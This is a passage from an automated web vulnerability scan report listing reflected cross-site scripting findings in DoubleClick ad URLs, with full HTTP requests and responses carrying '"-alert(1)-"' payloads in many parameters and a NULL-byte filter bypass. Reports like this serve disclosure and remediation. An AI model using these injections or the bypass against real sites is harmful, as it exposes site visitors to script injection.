Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
c%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=
...[SNIP]...

3.75. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a341"-alert(1)-"39b94f25674 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmo
...[SNIP]...

3.76. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eff5"-alert(1)-"d2ad32e2576 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA
...[SNIP]...

3.77. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f109"-alert(1)-"4d12fd2ad5e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports
...[SNIP]...

3.78. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8539"-alert(1)-"17e7812c6e was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6950

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

3.79. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e22b"-alert(1)-"4bbc9e4800b was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
g.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallows
...[SNIP]...

3.80. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4856"-alert(1)-"43dc123b662 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3af6/17/127/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=5
...[SNIP]...

3.81. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c801b"-alert(1)-"acd16220e0c was submitted in the oepartner parameter. This input was echoed as c801b"-alert(1)-"acd16220e0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5461
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:07:24 GMT
Expires: Wed, 27 Apr 2011 22:07:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0
...[SNIP]...

3.82. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e14e"-alert(1)-"ff222b8ffeb was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5452

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
7/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11
...[SNIP]...

3.83. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e8"-alert(1)-"168af111c1f was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5452

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.
...[SNIP]...

3.84. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0042f87"-alert(1)-"8498af5b338 was submitted in the pt parameter. This input was echoed as 42f87"-alert(1)-"8498af5b338 in the application's response.

